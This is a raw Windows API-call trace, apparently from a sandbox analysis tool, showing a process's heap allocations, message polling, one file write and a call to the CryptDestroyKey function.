[0184.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0184.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0184.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0184.658] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0184.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0184.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0184.659] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0184.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0184.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0184.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0184.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0184.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0184.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0184.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0184.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0184.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0184.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0184.661] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0184.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0184.661] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0184.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0184.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0184.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0184.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0184.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0184.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0184.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0184.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0184.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0184.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0184.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0184.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0184.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c00e08 [0184.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0184.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0184.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c21bc8 [0184.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0184.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c00e08 | out: hHeap=0x970000) returned 1 [0184.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0184.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0184.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0184.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c00e08 [0184.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c21bc8 | out: hHeap=0x970000) returned 1 [0184.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0184.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0184.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c21bc8 [0184.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c00e08 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0184.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0728 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0184.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0184.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0184.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0184.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0184.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0184.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0184.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0184.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0184.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0184.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0184.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c114e8 | out: hHeap=0x970000) returned 1 [0184.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0184.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0184.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0184.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0184.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0184.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0184.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0184.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0184.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0184.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0184.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0184.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0184.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0184.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0184.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0184.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f346f8 | out: hHeap=0x970000) returned 1 [0184.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0184.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0184.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x3c322a8 [0184.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c21bc8 | out: hHeap=0x970000) returned 1 [0184.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0184.779] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0184.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0184.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0184.779] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0184.780] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0184.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0184.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0184.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0184.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0184.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d8) returned 0x2f24018 [0184.782] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0x106d8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0x106d8, lpOverlapped=0x0) returned 1 [0184.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0184.785] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0184.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0184.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0184.785] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0184.786] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0184.786] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.786] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0184.786] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0184.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0184.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0184.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0184.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0184.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0184.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e508c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0184.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.787] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0184.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0184.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0184.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0184.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0184.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0184.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0184.788] CryptDestroyKey (hKey=0xa87050) returned 1 [0184.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0184.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0184.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0184.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0184.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0184.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0184.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0184.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0184.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0184.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0184.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0184.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0184.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0184.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0184.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0184.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0184.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0184.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0184.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0184.789] 